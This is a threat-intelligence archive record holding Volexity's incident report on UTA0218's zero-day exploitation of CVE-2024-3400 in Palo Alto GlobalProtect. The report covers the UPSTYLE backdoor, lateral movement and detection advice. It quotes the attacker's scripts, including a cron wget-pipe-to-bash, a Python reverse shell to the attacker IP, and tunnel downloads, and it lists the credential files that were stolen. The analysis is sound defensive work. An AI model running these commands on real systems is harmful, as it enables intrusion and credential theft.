{
	"id": "590b92d5-abb7-4280-ab8b-abf35b04185b",
	"created_at": "2026-04-06T00:16:09.062022Z",
	"updated_at": "2026-04-10T03:27:54.496064Z",
	"deleted_at": null,
	"sha1_hash": "3e977e4c58244ba5a0a3eb2e221be8138fd7fb3e",
	"title": "Zero-Day Exploitation of Unauthenticated Remote Code Execution Vulnerability in GlobalProtect (CVE-2024-3400)",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1147571,
	"plain_text": "Zero-Day Exploitation of Unauthenticated Remote Code Execution\r\nVulnerability in GlobalProtect (CVE-2024-3400)\r\nBy mindgrub\r\nPublished: 2024-04-12 · Archived: 2026-04-05 14:18:27 UTC\r\nVolexity would like to thank Palo Alto Networks for their partnership, cooperation, and rapid response\r\nto this critical issue. Their research can be found here.\r\nOn April 10, 2024, Volexity identified zero-day exploitation of a vulnerability found within the GlobalProtect\r\nfeature of Palo Alto Networks PAN-OS at one of its network security monitoring (NSM) customers. Volexity\r\nreceived alerts regarding suspect network traffic emanating from the customer’s firewall. A subsequent\r\ninvestigation determined the device had been compromised. The following day, April 11, 2024, Volexity observed\r\nfurther, identical exploitation at another one of its NSM customers by the same threat actor.\r\nThe threat actor, which Volexity tracks under the alias UTA0218, was able to remotely exploit the firewall device,\r\ncreate a reverse shell, and download further tools onto the device. The attacker focused on exporting configuration\r\ndata from the devices, and then leveraging it as an entry point to move laterally within the victim organizations.\r\nVolexity worked closely with its customer and the Palo Alto Networks Product Security Incident Response Team\r\n(PSIRT) to investigate the root cause of the compromise. Through this cooperative investigation, the Palo Alto\r\nNetworks PSIRT team was able to confirm the vulnerability as an OS command injection issue and assigned it\r\nCVE-2024-3400. The issue is an unauthenticated remote code execution vulnerability with a CVSS base score of\r\n10.0. Palo Alto Networks has since issued an advisory for CVE-2024-3400 that includes information regarding a\r\nhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\r\nPage 1 of 14\n\nthreat protection signature released to customers, as well as a timeline for a fix, which at the time of writing is\r\nexpected April 14, 2024.\r\nDuring its investigation, Volexity observed that UTA0218 attempted to install a custom Python backdoor, which\r\nVolexity calls UPSTYLE, on the firewall. The UPSTYLE backdoor allows the attacker to execute additional\r\ncommands on the device via specially crafted network requests. Details on this backdoor are included further on in\r\nthis report.\r\nAs Volexity broadened its investigation, it discovered successful exploitation at multiple other customers and\r\norganizations dating back to March 26, 2024. Those attempts appear to be the threat actor testing the vulnerability\r\nby placing zero-byte files on firewall devices to validate exploitability. On April 7, 2024, Volexity observed the\r\nattacker attempting and failing to deploy a backdoor on a customer’s firewall device. Three days later, on April 10,\r\n2024, UTA0218 was observed exploiting firewall devices to successfully deploy malicious payloads. A second\r\ncompromise Volexity observed on April 11, 2024, followed a nearly identical playbook. A timeline associated with\r\nthe discovery and subsequent activities is below.\r\nhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\r\nPage 2 of 14\n\nAfter successfully exploiting devices, UTA0218 downloaded additional tooling from remote servers they\r\ncontrolled in order to facilitate access to victims’ internal networks. They quickly moved laterally through victims’\r\nnetworks, extracting sensitive credentials and other files that would enable access during and potentially after the\r\nintrusion. The tradecraft and speed employed by the attacker suggests a highly capable threat actor with a clear\r\nplaybook of what to access to further their objectives. Volexity is not currently able to provide an estimate as to\r\nthe scale of exploitation taking place. It is likely the firewall device exploitation, followed by hands-on-keyboard\r\nactivity, was limited and targeted. However, as noted previously, evidence of potential reconnaissance activity\r\ninvolving more widespread exploitation aimed at identifying vulnerable systems does appear to have occurred at\r\nthe time of writing.\r\nVolexity strongly recommends organizations using Palo Alto Networks GlobalProtect firewall devices read the\r\nadvisory to ensure their firewall devices have the correct protections in place, or otherwise take mitigation actions\r\nto ensure they are no longer vulnerable. As always, it should be noted that these mitigations and fixes will not\r\nremediate an existing compromise. Affected organizations should rapidly investigate their systems and networks\r\nfor potential breaches.\r\nThis blog post describes the malware the attacker added to compromised devices, observed attempts at lateral\r\nmovement, and methods organizations can use to identify potential compromise of their networks.\r\nAnalysis\r\nInvestigation Summary\r\nVolexity used telemetry from its own network security sensors, client endpoint detection, response (EDR)\r\nsoftware, and forensic data collected from multiple systems to paint a thorough picture of the attacker’s actions in\r\nthe incidents investigated.\r\nBelow are the highlights of Volexity’s observations from the course of the performed investigations:\r\nZero-day exploitation of a vulnerability in Palo Alto Global Protect firewall devices that allowed for\r\nunauthenticated remote code execution to take place. Initial exploitation was used to create a reverse shell,\r\ndownload tools, exfiltrate configuration data, and move laterally within the network.\r\nThe threat actor has developed and attempted to deploy a novel python-based backdoor that Volexity calls\r\nUPSTYLE.\r\nThe earliest evidence of attempted exploitation observed by Volexity thus far is on March 26, 2024 when\r\nattackers appeared to verify that exploitation worked correctly.\r\nThe initial persistence mechanism setup by UTA0218 involved configuring a cron job that would use\r\nwget to retrieve a payload from an attacker-controlled URL with its output being written to stdout and\r\npiped to bash for execution. The attacker used this method to deploy and execute specific commands and\r\ndownload reverse proxy tooling such as GOST (GO Simple Tunnel).\r\nIn one case a service account configured for use by the Palo Alto firewall, and a member of the domain\r\nadmins group, was used by the attackers to pivot internally across the affected networks via SMB and\r\nWinRM.\r\nhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\r\nPage 3 of 14\n\nUTA0218’s initial objectives were aimed at grabbing the domain backup DPAPI keys and targeting active\r\ndirectory credentials by obtaining the NTDS.DIT file. They further targeted user workstations to steal\r\nsaved cookies and login data, along with the users’ DPAPI keys.\r\n A detailed description of the items summarized above can be found in the following sections.\r\nUPSTYLE Backdoor\r\nIn two cases UTA0218 was observed attempting to download and execute a backdoor Volexity calls UPSTYLE.\r\nThere were two slight variations of this tool observed with only minor differences between the files. In one case\r\nthe filename used by UTA0218 was update.py . UTA0218 attempted to download and execute this file via the\r\nCVE-2024-3400 but was unsuccessful. However, Volexity was still able to recover the file for analysis.\r\nName(s) update.py\r\nSize 5.1KB (5187 Bytes)\r\nFile Type text/plain\r\nMD5 0c1554888ce9ed0da1583dbdf7b31651\r\nSHA1 988fc0d23e6e30c2c46ccec9bbff50b7453b8ba9\r\nSHA256 3de2a4392b8715bad070b2ae12243f166ead37830f7c6d24e778985927f9caac\r\nVirusTotal First Submitted N/A\r\nThe purpose of the update.py script is to deploy a backdoor to the following path: /usr/lib/python3.6/site-packages/system.pth . The backdoor, written in Python, starts by an import and its main content is stored as a\r\nbase64 encoded blob. The .pth extension is used to append additional paths to a Python module. Starting with\r\nthe release of Python 3.5, lines in .pth files beginning with the text “ import ” followed by a space or a tab, are\r\nexecuted as described in the official documentation. Therefore, by creating this file, each time any other code on\r\nthe device attempts to import the module, the malicious code is executed.\r\nThe commands to be executed are forged by the attacker by requesting a non-existent web page which contains\r\nthe specific pattern. The backdoor’s purpose is to then parse the web server error log\r\n( /var/log/pan/sslvpn_ngx_error.log ) looking for the pattern, and to parse and decode data added to the non-existent URI, executing the command contained within. The command output is then appended to a CSS file\r\nwhich is a legitimate part of the firewall ( /var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css ).\r\nAfter the command’s execution is complete and the output has been written, the log entry that was originally read\r\nand contained the command is removed from the sslvpn_ngx_error.log file. Fifteen seconds after execution,\r\nthe original version of bootstrap.min.css is also restored to its previous state. The access and modified\r\ntimestamps are also restored for both files. Figure 1 shows UPSTYLE main loop.\r\nhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\r\nPage 4 of 14\n\nFigure 1. UPSTYLE main loop\r\nThe overall workflow of the malware is described in Figure 2.\r\nhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\r\nPage 5 of 14\n\nFigure 2. UPSTYLE workflow\r\nPost-exploitation Activity\r\nFor the purpose of this blog post, the following filenames and indicators are related to the exploitation that\r\noccurred on April 10, 2024. However, the reader should note that in subsequent exploitation, these files were\r\naltered by UTA0218 for different victims. Their purpose and operation, however, were fundamentally the same.\r\nAfter exploitation, the threat actor established persistence by continuously fetching and executing the contents of a\r\nfile named patch . When executed, this file downloads and executes a remotely hosted file named policy . By\r\nmodifying the contents of the policy file, the threat actor was able to execute a variety of commands on the\r\ncompromised device. A total of six different permutations of the policy file were observed by Volexity.\r\nThe details of the patch file are shown below:\r\nName(s) patch\r\nSize 160.0B (160 Bytes)\r\nFile Type text/plain\r\nMD5 d31ec83a5a79451a46e980ebffb6e0e8\r\nSHA1 a7c6f264b00d13808ceb76b3277ee5461ae1354e\r\nSHA256 35a5f8ac03b0e3865b3177892420cb34233c55240f452f00f9004e274a85703c\r\nVirusTotal First Submitted N/A\r\nThe contents of the patch file are shown below:\r\nif [ ! -f '/etc/cron.d/update' ]; then\r\n  printf \"SHELL=/bin/bash\\n\\n* * * * * root wget -qO- http://172.233.228[.]93/policy |\r\nbash\\n\\n\" \u003e /etc/cron.d/update\r\nfi\r\nWhen executed, it checks for the existence of a cron file named update . If this cron file does not exist, it creates\r\nthe file and uses it to establish a cron job. It also downloads a remotely hosted file named policy and executes it\r\nvia bash every 60 seconds. The attacker then manually updates the contents of the remote file over time to retrieve\r\ndata from the device and create a reverse shell.\r\nInterestingly, the attacker appeared to manually manage an access control list for this command-and-control (C2)\r\nserver, as it could not be accessed on the same port from any location other than the device communicating with it.\r\nMalicious Code Executed via Policy File\r\nSix different versions of the policy file were observed by Volexity. They each represent a different set of actions\r\ntaken by the threat actor on a compromised device. The numbered versions that follow are the order in which they\r\nhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\r\nPage 6 of 14\n\nwere used by the threat actor.\r\nVersion 1\r\nThis file contained a one-liner reverse shell written in Python.\r\nName(s) policy\r\nSize 287B (287 Bytes)\r\nFile Type text/x-shellscript\r\nMD5 a43e3cf908244f85b237fdbacd8d82d5\r\nSHA1 e1e427c9b46064e2b483f90b13490e6ef522cc06\r\nSHA256 755f5b8bd67d226f24329dc960f59e11cb5735b930b4ed30b2df77572efb32e8\r\nVirusTotal First Submitted N/A\r\n#!/bin/bash\r\nr=`ps -ef | grep \"import sys,socket,os\" | grep -v grep`\r\nif [[ -z \"$r\" ]]; then\r\n  python -c \"import sys,socket,os,pty;s=socket.socket(socket.AF_INET,\r\nsocket.SOCK_STREAM);s.connect(('172.233.228[.]93',443));[os.dup2(s.fileno(),fd) for fd in\r\n(0,1,2)];pty.spawn('/bin/bash')\"\r\nfi\r\nVersion 2\r\nThe attacker removed any previously created CSS files containing various attacker command output, and then\r\ncopied the configuration data from the firewall device into a new file, storing the hostname of the device in the\r\nCSS file. These files were saved to an externally accessible web directory where the attacker could subsequently\r\nretrieve them.\r\nName(s) policy\r\nSize 216B (216 Bytes)\r\nFile Type text/x-shellscript\r\nMD5 5e4c623296125592256630deabdbf1d2\r\nSHA1 d12b614e9417c4916d5c5bb6ee42c487c937c058\r\nSHA256 adba167a9df482aa991faaa0e0cde1182fb9acfbb0dc8d19148ce634608bab87\r\nVirusTotal First Submitted N/A\r\nhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\r\nPage 7 of 14\n\n#!/bin/bash\r\nrm -f /var/appweb/sslvpndocs/global-protect/*.css\r\ncp /opt/pancfg/mgmt/saved-configs/running-config.xml /var/appweb/sslvpndocs/global-protect/\u003credacted\u003e.css\r\nuname -a \u003e /var/appweb/sslvpndocs/global-protect/\u003credacted\u003e.css\r\nVersion 3\r\nThis file was used to remove CSS files created in the previous step.\r\nName(s) policy\r\nSize 62B (62 Bytes)\r\nFile Type text/x-shellscript\r\nMD5 87312a7173889a8a5258c68cac4817bd\r\nSHA1 3ad9be0c52510cbc5d1e184e0066d14c1f394d4d\r\nSHA256 c1a0d380bf55070496b9420b970dfc5c2c4ad0a598083b9077493e8b8035f1e9\r\nVirusTotal First Submitted N/A\r\n#!/bin/bash\r\nrm -f /var/appweb/sslvpndocs/global-protect/*.css\r\nVersion 4\r\nThis version attempts to download a Golang tunneling tool named GOST and execute it with two different\r\ncommand-line options to establish SOCKS5 and RTCP tunnels. However, the threat actor appears to have failed to\r\nsuccessfully download the tool on this attempt.\r\nName(s) policy\r\nSize 388B (388 Bytes)\r\nFile Type text/x-shellscript\r\nMD5 b9f5e9db9eec8d1301026c443363cf6b\r\nSHA1 d7a8d8303361ffd124cb64023095da08a262cab4\r\nSHA256 fe07ca449e99827265ca95f9f56ec6543a4c5b712ed50038a9a153199e95a0b7\r\nVirusTotal First Submitted N/A\r\n#!/bin/bash\r\nwget http://172.233.228[.]93/vpn_prot.gz -O /tmp/vpn_prot.gz\r\nhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\r\nPage 8 of 14\n\nls -l /tmp/vpn_prot.gz \u003e /var/appweb/sslvpndocs/global-protect/u.css\r\ngzip -d /tmp/vpn_prot.gz\r\nchmod +x /tmp/vpn_prot\r\nnohup /tmp/vpn_prot -L=socks5://127.0.0[.]1:8123 \u003e /dev/null 2\u003e\u00261 \u0026\r\nnohup /tmp/vpn_prot -L rtcp://127.0.0[.]1:8080/127.0.0[.]1:8123 -F ssh://user0:\r\n[password_redacted]@172.233.228[.]93:8443?ping=180 \u003e /dev/null 2\u003e\u00261 \u0026\r\nVersion 5\r\nThis is a modified version of Version 4 that successfully downloads GOST in a base64-encoded format.\r\nName(s) policy\r\nSize 421B (421 Bytes)\r\nFile Type text/x-shellscript\r\nMD5 12b5e30c2276664e87623791085a3221\r\nSHA1 f99779a5c891553ac4d4cabf928b2121ca3d1a89\r\nSHA256 96dbec24ac64e7dd5fef6e2c26214c8fe5be3486d5c92d21d5dcb4f6c4e365b9\r\nVirusTotal First Submitted N/A\r\n#!/bin/bash\r\nwget http://172.233.228[.]93/vpn.log -O /tmp/vpn.log\r\nbase64 -d /tmp/vpn.log \u003e /tmp/vpn_prot.gz\r\nls -l /tmp/vpn_prot.gz \u003e /var/appweb/sslvpndocs/global-protect/u.css\r\ngzip -d /tmp/vpn_prot.gz\r\nchmod +x /tmp/vpn_prot\r\nnohup /tmp/vpn_prot -L=socks5://127.0.0[.]1:8123 \u003e /dev/null 2\u003e\u00261 \u0026\r\nnohup /tmp/vpn_prot -L rtcp://127.0.0[.]1:8080/127.0.0.1:8123 -F ssh://user0:\r\n[password_redacted]@172.233.228[.]93:8443?ping=180 \u003e /dev/null 2\u003e\u00261 \u0026\r\nThe details of the GOST sample are as follows:\r\nName(s) gost-linux-amd64\r\nSize 12.9MB (13578240 Bytes)\r\nFile Type ELF\r\nMD5 089801d87998fa193377b9bfe98e87ff\r\nSHA1 4ad043c8f37a916761b4c815bed23f036dfb7f77\r\nSHA256 448fbd7b3389fe2aa421de224d065cea7064de0869a036610e5363c931df5b7c\r\nhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\r\nPage 9 of 14\n\nVirusTotal First Submitted 2023-01-29 01:30:47 UTC | af632c50 (api) – Unknown US\r\nVersion 6\r\nThis file contains commands to download and execute an open-source reverse shell that operates over SSH. The\r\nthreat actor configures this shell to run on port 31289.\r\nName(s) policy(6)\r\nSize 189.0B (189 Bytes)\r\nFile Type text/x-shellscript\r\nMD5 724c8059c150b0f3d1e0f80370bcfe19\r\nSHA1 5592434c40a30ed2dfdba0a86832b5f2eaaa437c\r\nSHA256 e315907415eb8cfcf3b6a4cd6602b392a3fe8ee0f79a2d51a81a928dbce950f8\r\nVirusTotal First Submitted N/A\r\n#!/bin/bash\r\nwget http://172.233.228[.]93/lowdp -O /tmp/lowdp\r\nls -l /tmp/lowdp \u003e /var/appweb/sslvpndocs/global-protect/u.css\r\nchmod +x /tmp/lowdp\r\nnohup /tmp/lowdp -l -p 31289 \u003e /dev/null 2\u003e\u00261 \u0026\r\nDetails of the binary are shown below:\r\nName(s) reverse-sshx64\r\nSize 3.5MB (3690496 Bytes)\r\nFile Type ELF\r\nMD5 427258462c745481c1ae47327182acd3\r\nSHA1 ef8036eb4097789577eff62f6c9580fa130e7d56\r\nSHA256 161fd76c83e557269bee39a57baa2ccbbac679f59d9adff1e1b73b0f4bb277a6\r\nVirusTotal First Submitted 2022-08-08 18:30:19 UTC | 1c0b809a (web) – Unknown NL\r\nLateral Movement \u0026 Data theft\r\nIn one instance of successful compromise, a highly privileged service account used by the Palo Alto Networks\r\nfirewall device was used by the attacker to pivot into the internal network via SMB and WinRM. The targeted data\r\nhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\r\nPage 10 of 14\n\nincluded the Active Directory database ( ntds.dit ), key data (DPAPI) and Windows event logs ( Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx ).\r\nIn addition to Windows-related data, the attacker also stole Login Data , Cookies , and Local State data for\r\nChrome and Microsoft Edge from specific targets. With this data, the attacker was able to grab the browser master\r\nkey and decrypt sensitive data, such as stored credentials.\r\nThe list of files grabbed by the attacker is below:\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Network\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Network\\Cookies\r\n%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Local State\r\n%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Login Data\r\n%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\r\n%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Network\\Cookies\r\n%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Local State\r\n%APPDATA%\\Roaming\\Microsoft\\Protect\\\u003cSID\u003e -\u003e DPAPI Keys\r\n%SystemRoot%\\NTDS\\ntds.dit\r\n%SystemRoot%\\System32\\winevt\\Logs\\Microsoft-Windows-TerminalServices-LocalSessionManager%4Operational.evtx\r\nUTA0218 was not observed deploying malware or additional methods of persistence on systems within victim\r\nnetworks. This may be due in part to the rapid detection and response by Volexity and its customers. The stolen\r\ndata did allow the attacker to effectively compromise credentials for all domain accounts. Further, the attacker\r\ngained access and could potentially use valid credentials or cookies taken from browser data for specific user\r\nworkstations accessed.\r\nInfrastructure\r\nVolexity observed UTA0218 leveraging a mix of infrastructure during their operations, which can be broadly\r\nbroken into two categories:\r\nC2 infrastructure hosting malware, used for communication channels\r\nAnonymized source infrastructure, used to access tooling and interact with victim infrastructure\r\nThe anonymized infrastructure appears to have included a mix of VPN usage, as well as potentially compromised\r\nASUS routers. The infrastructure was used to access files created by the attacker. Additionally, UTA0218 abused a\r\ncompromised AWS bucket and various Virtual Private Servers (VPS) providers to store malicious files. The\r\ninfrastructure observed by Volexity does not have any overlaps with other threat actors in Volexity’s aperture at\r\nthis time.\r\nDetecting Compromise\r\nhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\r\nPage 11 of 14\n\nThere are two primary methods for identifying compromise on an impacted firewall device. The first method\r\ninvolves monitoring network traffic and activity emanating from Palo Alto Networks firewall devices. Volexity is\r\nstill working to coordinate with Palo Alto Networks regarding the second method and thus is not describing it at\r\nthis time. Volexity will update this blog post when more details can be made available.\r\nThe section that follows describes what organizations can do to look for signs of compromise. Any of these\r\nmethods can provide strong evidence that the Palo Alto Networks GlobalProtect firewall device is compromised.\r\nShould signs of compromise be identified, refer to Responding to Compromise for what to do next.\r\nNetwork Traffic Analysis\r\nVolexity initially identified activity that led to the discovery of the Palo Alto Networks GlobalProtect firewall\r\ndevice exploitation via an alert for malicious network requests generated by Volexity’s NSM sensors. Review of\r\nnetwork traffic logs for outbound connections originating from the GlobalProtect firewall device, as well as\r\ndestined for the device, can help identify anomalous activity. Example activity that Volexity observed from\r\ncompromised GlobalProtect devices includes the following:\r\nDirect-to-IP HTTP requests to download files noted in the previous section via wget\r\nWhile it would not be uncommon to observe wget requests for files in a larger environment, this type of\r\nrequest originating from the firewall device is not something Volexity has observed outside of the attacker\r\nactivity.\r\nSMB / RDP connections to multiple systems across the environment, originating from the GlobalProtect\r\nappliance\r\nSMB file transfers of Google Chrome or Microsoft Edge browser data or the ntds.dit file\r\nHTTP request for the URL worldtimeapi[.]org/api/timezone/etc/utc originating from the Global\r\nProtect appliance\r\nWhile this hostname is legitimate, in both occurrences of compromise an HTTP GET request to this URL\r\nwas observed. This does not appear to be a commonly occurring network request.\r\nVolexity also leveraged its customer’s Endpoint Detection and Response (EDR) software to investigate alerts that\r\ntriggered for data exfiltration over SMB. Having both network visibility and EDR telemetry allowed Volexity to\r\nfully map out all systems the attacker accessed via the compromised GlobalProtect firewall device.\r\nGlobalProtect Firewall Device Log Analysis\r\nDuring Volexity’s incident response investigations, the affected customers were able to generate a tech support file\r\nfrom the compromised firewall devices. This tech support file is an archive that contains files Palo Alto Networks\r\ntech support can use to troubleshoot issues organizations are having with their firewall devices. It also contains\r\nlogs Volexity noted as having key forensic artifacts and could potentially help determine if a device is\r\ncompromised.\r\nTo generate a tech support file, Palo Alto GlobalProtect system administrators can navigate within the WebGUI to\r\nthe Device tab, or if in Panorama to the Panorama tab. From here, navigate to the “Support” page and look under\r\nthe Tech Support File section for “Generate Tech Support File.” Clicking this will generate a tech support file that\r\nhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\r\nPage 12 of 14\n\ncan be downloaded by selecting “Download Tech Support File” when it becomes available. This may also be done\r\nvia the command-line interface using one of two commands:\r\ntftp export tech-support to \u003ctftp host\u003e\r\nscp export tech-support to \u003cusername@host:path\u003e\r\nMore information on this process from Palo Alto Networks can be found here.\r\nVolatile Memory Collection\r\nCollecting volatile memory from potentially compromised devices requires assistance from Palo Alto Networks\r\ntechnical support. It is not currently possible for Palo Alto Networks customers to collect memory on their own.\r\nDue to these collection challenges, Volexity products currently do not officially support Palo Alto Networks\r\nfirewall devices.\r\nVolatile Memory Analysis with Volexity Volcano\r\nVolexity regularly leverages memory forensics when investigating or confirming compromises. Due to the\r\nsensitive nature of the artifacts in memory and the pending coordination efforts with Palo Alto Networks, Volexity\r\nwill share more details of this analysis with Volexity Volcano in a future update.\r\nResponding to Compromise\r\nIf you discover that your Palo Alto Network GlobalProtect firewall device is compromised, it is important to take\r\nimmediate action. Make sure to not wipe or rebuild the appliance. Collecting logs, generating a tech support file,\r\nand preserving forensics artifacts (memory and disk) from the device are crucial.\r\nPivoting to analyzing internal systems and tracking potential lateral movement should be done as soon as possible.\r\nFurther, any credentials, secrets, or other sensitive data that may have been stored on the GlobalProtect firewall\r\ndevice should be considered compromised. This may warrant password resets, changing of secrets, and additional\r\ninvestigations.\r\nVolexity strongly recommends that organizations look for signs of lateral movement internally from their Palo\r\nAlto Networks GlobalProtect firewall device that is not consistent with expected behavior. Proactive checks of\r\nany externally facing infrastructure may also be warranted if internal visibility is limited.\r\nIf you need assistance validating or responding to a breach, please feel free to contact Volexity for breach\r\nassistance.\r\nConclusion\r\nTargeting edge devices remains a popular vector of attack for capable threat actors who have the time and\r\nresources to invest into researching new vulnerabilities. Having a robust detection stack is critical in identifying\r\nactivity related to exploits, inclusive of network monitoring and EDR capabilities to identify lateral movement.\r\nEarly detection of intrusions greatly reduces the scope and costs associated to mitigation.\r\nhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\r\nPage 13 of 14\n\nVolexity tracks activity described in this blog post under the moniker UTA0218. At the time of writing, Volexity\r\nwas unable to link the activity to other threat activity. Volexity assesses that it is highly likely UTA0218 is a state-backed threat actor based on the resources required to develop and exploit a vulnerability of this nature, the type\r\nof victims targeted by this actor, and the capabilities displayed to install the Python backdoor and further access\r\nvictim networks.\r\nAs with previous public disclosures of vulnerabilities in these kinds of devices, Volexity assesses that it is likely a\r\nspike in exploitation will be observed over the next few days by UTA0218 and potentially other threat actors who\r\nmay develop exploits for this vulnerability. This spike in activity will be driven by the urgency of this window of\r\naccess closing due to mitigations and patches being deployed. It is therefore imperative that organizations act\r\nquickly to deploy recommended mitigations and perform compromise reviews of their devices to check whether\r\nfurther internal investigation of their networks is required.\r\nThis blog post provided guidance on prevention and detection; related indicators can also be downloaded from the\r\nVolexity GitHub page:\r\nYARA rules\r\nSingle value indicators\r\nFor more information about Volexity’s Network Security Monitoring service or Volexity’s leading\r\nmemory analysis product, Volexity Volcano, please do not hesitate to contact us.\r\nSource: https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalpr\r\notect-cve-2024-3400/\r\nhttps://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/\r\nPage 14 of 14",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"MISPGALAXY",
		"MITRE"
	],
	"references": [
		"https://www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/"
	],
	"report_names": [
		"zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400"
	],
	"threat_actors": [
		{
			"id": "eb3f4e4d-2573-494d-9739-1be5141cf7b2",
			"created_at": "2022-10-25T16:07:24.471018Z",
			"updated_at": "2026-04-10T02:00:05.002374Z",
			"deleted_at": null,
			"main_name": "Cron",
			"aliases": [],
			"source_name": "ETDA:Cron",
			"tools": [
				"Catelites",
				"Catelites Bot",
				"CronBot",
				"TinyZBot"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "38cecfb3-e717-4b4a-9792-f95e4ba4521d",
			"created_at": "2024-04-23T02:00:04.248176Z",
			"updated_at": "2026-04-10T02:00:03.632032Z",
			"deleted_at": null,
			"main_name": "UTA0218",
			"aliases": [],
			"source_name": "MISPGALAXY:UTA0218",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434569,
	"ts_updated_at": 1775791674,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3e977e4c58244ba5a0a3eb2e221be8138fd7fb3e.pdf",
		"text": "https://archive.orkl.eu/3e977e4c58244ba5a0a3eb2e221be8138fd7fb3e.txt",
		"img": "https://archive.orkl.eu/3e977e4c58244ba5a0a3eb2e221be8138fd7fb3e.jpg"
	}
}